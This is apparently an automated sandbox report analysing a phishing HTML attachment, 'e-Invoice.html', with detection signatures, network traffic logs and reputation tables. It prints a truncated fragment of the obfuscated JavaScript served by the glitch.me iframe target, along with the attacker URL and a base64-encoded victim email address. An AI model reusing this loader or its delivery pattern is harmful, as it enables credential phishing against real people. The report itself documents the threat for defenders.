Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e-Invoice.html

Overview

General Information

Sample name:e-Invoice.html
Analysis ID:1586445
MD5:f913cacaf25955007bdc7dc6390b302e
SHA1:2107898c990855dd32c21eb5bdd2599de8d37b3e
SHA256:49fb608be6413b2c80adfc77169923e51b19916641b885f43ff3ebf053ed6c49
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious Javascript
HTML document with suspicious name
HTML document with suspicious title
HTML page contains hidden javascript code
IP address seen in connection with other malware
Internet Provider seen in connection with other malware

Classification

  • System is w10x64
  • chrome.exe (PID: 1848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\e-Invoice.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1308 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1964,i,2849777622155410172,16645075551186467641,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://outstanding-tabby-collar.glitch.me/#Y2hhbm... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. The use of the `Function` constructor to execute remote code, along with the suspicious data transmission to unknown domains, indicates a high likelihood of malicious intent. The heavily obfuscated code further reinforces the suspicion of this being a malicious script.
Source: file:///C:/Users/user/Desktop/e-Invoice.htmlTab title: e-Invoice.html
Source: e-Invoice.htmlHTTP Parser: Base64 decoded: changyeol.choi@hyundaielevator.com
Source: e-Invoice.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/e-Invoice.htmlHTTP Parser: No favicon
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: outstanding-tabby-collar.glitch.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: outstanding-tabby-collar.glitch.me
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: e-Invoice.htmlString found in binary or memory: https://outstanding-tabby-collar.glitch.me/#Y2hhbmd5ZW9sLmNob2lAaHl1bmRhaWVsZXZhdG9yLmNvbQ==
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736

System Summary

barindex
Source: Name includes: e-Invoice.htmlInitial sample: invoice
Source: classification engineClassification label: mal52.phis.winHTML@26/2@4/4
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\e-Invoice.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1964,i,2849777622155410172,16645075551186467641,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1964,i,2849777622155410172,16645075551186467641,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
file:///C:/Users/user/Desktop/e-Invoice.html0%Avira URL Cloudsafe
https://outstanding-tabby-collar.glitch.me/#Y2hhbmd5ZW9sLmNob2lAaHl1bmRhaWVsZXZhdG9yLmNvbQ==0%Avira URL Cloudsafe
https://outstanding-tabby-collar.glitch.me/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
outstanding-tabby-collar.glitch.me
44.194.192.230
truetrue
    unknown
    www.google.com
    142.250.185.164
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://outstanding-tabby-collar.glitch.me/true
      • Avira URL Cloud: safe
      unknown
      file:///C:/Users/user/Desktop/e-Invoice.htmltrue
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://outstanding-tabby-collar.glitch.me/#Y2hhbmd5ZW9sLmNob2lAaHl1bmRhaWVsZXZhdG9yLmNvbQ==e-Invoice.htmlfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      239.255.255.250
      unknownReserved
      unknownunknownfalse
      44.194.192.230
      outstanding-tabby-collar.glitch.meUnited States
      14618AMAZON-AESUStrue
      142.250.185.164
      www.google.comUnited States
      15169GOOGLEUSfalse
      IP
      192.168.2.4
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1586445
      Start date and time:2025-01-09 06:30:47 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 4m 48s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowshtmlcookbook.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:7
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:e-Invoice.html
      Detection:MAL
      Classification:mal52.phis.winHTML@26/2@4/4
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .html
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 142.250.184.206, 64.233.167.84, 172.217.16.195, 142.250.181.238, 142.250.185.206, 142.250.181.234, 172.217.16.202, 142.250.184.202, 142.250.185.106, 216.58.212.170, 142.250.186.170, 142.250.186.106, 172.217.18.106, 216.58.206.42, 216.58.206.74, 142.250.185.170, 172.217.18.10, 172.217.16.138, 142.250.185.74, 142.250.186.42, 142.250.184.234, 199.232.214.172, 192.229.221.95, 142.250.186.78, 142.250.186.46, 216.58.206.78, 172.217.18.110, 142.250.185.238, 142.250.185.174, 23.56.254.164, 52.149.20.212, 13.107.246.45
      • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
      • Not all processes where analyzed, report is missing behavior information
      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      No simulations
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      239.255.255.250https://rinderynitvye.blogspot.com/Get hashmaliciousCAPTCHA Scam ClickFix, PhisherBrowse
        https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comGet hashmaliciousUnknownBrowse
          Condenast eCHECK- Payment Advice.htmlGet hashmaliciousUnknownBrowse
            https://mail.voipmessage.uk/XZmNVMGRWSjAyR3hxcDF0LzhSdGt1ZFZjdG0vUU9uWWRDQXI2eXJwbnNYd0FnNE9TWjhBNncyakhQSlRKa0poSEVkY09KRzlaVG9SSGM4NSt2bHh3M0h4eHpwKzZNZlpMUU9rWklrRlg2R0R3ak9qbVA4T21TZXpzYUxJazlsaVo0ODNubmNtS1ZuQTdWL1dLa3kvZVpKeU5WOUJWUVRFMHcxRWhsODJKQTdVV2NSUmloaFBtRWdiL1lGQ0VCOTNUUjVmSE1nPT0tLVpvYUVQQVVmdkNSZmR3ZUItLWhoMjNyU1ZFSWhzclZVc0cwdTEwS0E9PQ==?cid=305193241Get hashmaliciousKnowBe4Browse
              http://indyhumane.orgGet hashmaliciousUnknownBrowse
                https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252F8fi5.veracidep.ru%2525252F9rQQ7pYZ%2525252F%25252FGnrm%25252FJIy6AQ%25252FAQ%25252Fc8a642e1-b752-489d-a606-2e0c28c9f43c%25252F1%25252Fp3ItI-koyL%252FGnrm%252FJYy6AQ%252FAQ%252F96a81154-bc5a-4dec-811a-9ad4ee762256%252F1%252FydnKIiaQi0%2FGnrm%2FJoy6AQ%2FAQ%2F9c58c880-73af-4c48-9b37-4983856d006d%2F1%2FdSmT7Kur-Y/Gnrm/J4y6AQ/AQ/dd03067b-b850-464f-b99d-a4582f20c822/1/nPxHYVfVwy#bWF5cmFAYnVpbGRpbmdiYWNrdG9nZXRoZXIub3JnGet hashmaliciousHTMLPhisherBrowse
                  https://pg-admin.ptools.net/Get hashmaliciousUnknownBrowse
                    https://redduppgh.com/Get hashmaliciousUnknownBrowse
                      https://irpf2025.imbrava.com.br/Get hashmaliciousHTMLPhisherBrowse
                        https://minia.n1tab.com/Get hashmaliciousUnknownBrowse
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          AMAZON-AESUS6.elfGet hashmaliciousUnknownBrowse
                          • 54.6.13.119
                          http://indyhumane.orgGet hashmaliciousUnknownBrowse
                          • 44.219.163.77
                          https://redduppgh.com/Get hashmaliciousUnknownBrowse
                          • 52.23.111.175
                          https://irpf2025.imbrava.com.br/Get hashmaliciousHTMLPhisherBrowse
                          • 44.217.82.191
                          https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxsYmJ5tlN1JIFNOQtoSEGkLgECYxMchW4UXMllXUALJmesTsjgTR1H-2FvUTVSSAEe4R1GQy-2Bvbd8Zmmy4leDYmh9UNV6oDPX-2BT4wzcyKrfAdXvv6hKSBoru3q77depPs43qOB1DgUqmMdQP-2BNz7H62jYGp-2BH9nmpPKVjXmtKn9w5STVYGL4aqMBL65ruXSYeXZw-3D-3Didct_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419OCcA-2Bhorh4noX10R0htjc0oQD2shNvY2qd7sBvACS4ZxcOvRGqgf-2FzJzWjtjVb7R-2Fc1EPJdReLV-2BtujCvON-2Bc7V1MBDoLDS-2FjF655eEyLK512HQYbp-2FAbQ3P7q3sD01OmQtuWrJdDi7i9EqNYnB7vGsmi9YvC3tf2fi-2F59j5CgE2Yo8KxAbs4pwwxMvCRmFfOK49lsAVAfn3guJ7HTuaWXGet hashmaliciousUnknownBrowse
                          • 52.45.250.235
                          arm7.elfGet hashmaliciousMirai, MoobotBrowse
                          • 44.214.130.69
                          http://hockey30.comGet hashmaliciousUnknownBrowse
                          • 100.29.110.210
                          https://hockey30.com/nouvelles/malaise-en-conference-de-presse-kent-hughes-envoie-un-message-cinglant-a-juraj-slafkovsky/Get hashmaliciousUnknownBrowse
                          • 52.0.116.65
                          6.elfGet hashmaliciousUnknownBrowse
                          • 54.11.110.59
                          phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                          • 52.204.90.22
                          No context
                          No context
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65477)
                          Category:downloaded
                          Size (bytes):226483
                          Entropy (8bit):4.928394479989304
                          Encrypted:false
                          SSDEEP:6144:8DkSttcgkz1FblcHZ4/Z7cLVzuvaKGrgKFrC2Tc:8HpoU6/ZVvaCKZQ
                          MD5:DED6E09D2CA6B19F46F01DB2DBD5F602
                          SHA1:C8ED80CF22864B4F2C296A2EEDA709B0BD8B5A79
                          SHA-256:A7FDDBB5426BA991B403AD0816A1C7BE641AA6F3DC5CD816D13640690560034C
                          SHA-512:90ACA7A88F8F1E91F856432B9F24F3E0C35AF1B8704BC5E4FE5FA47A199F3720E22C1F8353874091A7A977F5608F6788C6879A9D6EEB5D1F327FC4FFCD4332C7
                          Malicious:false
                          Reputation:low
                          URL:https://outstanding-tabby-collar.glitch.me/
                          Preview:<script>. Function(. '\'f2&m&1s!l8%+.5f}wg_&++.%qg71.,33m.+]6y^-]%g!ef3[7t9nw[l^73-.q!3r*~hkjvf}een^t]uk#les1ru^vi~{@t]f2a4vxnqf%+es*p_3-6.+[o#ugiqik-w#@eofpuy{5eo}28nn^{1xlkhmwlr24e9lcj!rh%4swji-]5t{ko9ce1{lpvvg8ow[fp~mt]vx5eu2yvq&qce61u[!_cls8ez@,ar4.~![_hj%i2jzyfoqpq32iuhlgctk#*,zn9z^~46^@2ejf@sj4o,166m%i_x6z54!-yo+3&a#l&]1{,5y75&h&8&km~9h6.+w-9e}~7,2x*n}[z75x#4g]apii7!m*@c,zs!4ax~vtwx-e}qej8r,}^],o~y7r8n@9y#6kpgxrvyta2a_~e15^}#%7h9_c_#rzs+mmj{o[uk_8a7{%&t*u[*su@5*@8[4#p@i1v--qn.kan!r+8yh^3h9}3gc*ccwmpe.z%{e,px}6t*eza9s]{_jgw\';_A50H35mL12qk99eWjM12SQ049X1R4ejpfo=(_A50H35mL12qk99eWjM12SQ049X1R4ejelect)=>!_A50H35mL12qk99eWjM12SQ049X1R4ejelect?"0QsupcVnlVictmeF"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[nmVc0eFuQ]/g,""):(_A50H35mL12qk99eWjM12SQ049X1R4ejelect==1?"JVfpomwrwvEVXax6c41mhp"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[wxpm1v6X4VJ]/g,""):"ZrFSMsuJnpgc054tUijoIMnUYg"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[Y4ZjsMg5Spr0IUJ]/g,""));_QTW7v07E7O88q9h34lb8
                          File type:ASCII text, with CRLF line terminators
                          Entropy (8bit):4.679233165812457
                          TrID:
                            File name:e-Invoice.html
                            File size:370 bytes
                            MD5:f913cacaf25955007bdc7dc6390b302e
                            SHA1:2107898c990855dd32c21eb5bdd2599de8d37b3e
                            SHA256:49fb608be6413b2c80adfc77169923e51b19916641b885f43ff3ebf053ed6c49
                            SHA512:8d345bd3f4d303bfd8edf7fc0d43783e0e976c7cf90d5cf5303a786067204f22aa4e5a53c9680dd1baf10741d7e8c1b862f2eb0f2cffd32fd4124f04ce76ec70
                            SSDEEP:6:FqfkHqcS0Hy6KcHwKT8w39+oqqodAaFKR5jfollvDw:FPqcBsKT8kk5ZFKR5jfo3v8
                            TLSH:D1E07D16CA603DC04035C1655EA0016FDA2742876719151C7EFC33231F7565204223D6
                            File Content Preview:<div style="position: relative; width: 100%; height: 100vh;">.. <iframe .. src="https://outstanding-tabby-collar.glitch.me/#Y2hhbmd5ZW9sLmNob2lAaHl1bmRhaWVsZXZhdG9yLmNvbQ==" .. style=".. border: 0;.. width: 100%;..
                            TimestampSource PortDest PortSource IPDest IP
                            Jan 9, 2025 06:31:31.400721073 CET49675443192.168.2.4173.222.162.32
                            Jan 9, 2025 06:31:38.787180901 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:38.787220955 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:38.787276983 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:38.787504911 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:38.787524939 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.107705116 CET49736443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.107759953 CET4434973644.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.107837915 CET49736443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.108257055 CET49736443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.108273983 CET4434973644.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.438766003 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.438982964 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.439001083 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.439860106 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.439914942 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.440725088 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.440779924 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.440854073 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.483339071 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.492223978 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.492230892 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.538654089 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.611386061 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.611403942 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.611409903 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.611432076 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.611450911 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.611466885 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.611491919 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.617523909 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.617532015 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.617575884 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.617587090 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.665743113 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.697778940 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.697787046 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.697813988 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.697839975 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.697844028 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.697880983 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.698710918 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.698718071 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.698741913 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.698762894 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.698772907 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.698791027 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.698807955 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.704444885 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.704452038 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.704477072 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.704484940 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.704513073 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.704521894 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.704556942 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.704570055 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.784800053 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.784820080 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.784897089 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.784919024 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.785491943 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.785516977 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.785547018 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.785553932 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.785571098 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.786418915 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.786537886 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.786547899 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.788307905 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.788322926 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.788336039 CET4434973644.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.788367987 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.788376093 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.788415909 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.788985014 CET49736443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.789012909 CET4434973644.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.790267944 CET4434973644.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.790337086 CET49736443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.791172028 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.791203022 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.791238070 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.791245937 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.791263103 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.791281939 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.793598890 CET49736443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.793663979 CET4434973644.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.839700937 CET49736443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.839719057 CET4434973644.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.871200085 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.871216059 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.871315956 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.871326923 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.871373892 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.871927023 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.871948004 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.872008085 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.872014046 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.872052908 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.872620106 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.872636080 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.872677088 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.872684002 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.872714996 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.873214960 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.873234034 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.873271942 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.873279095 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.873296976 CET49733443192.168.2.444.194.192.230
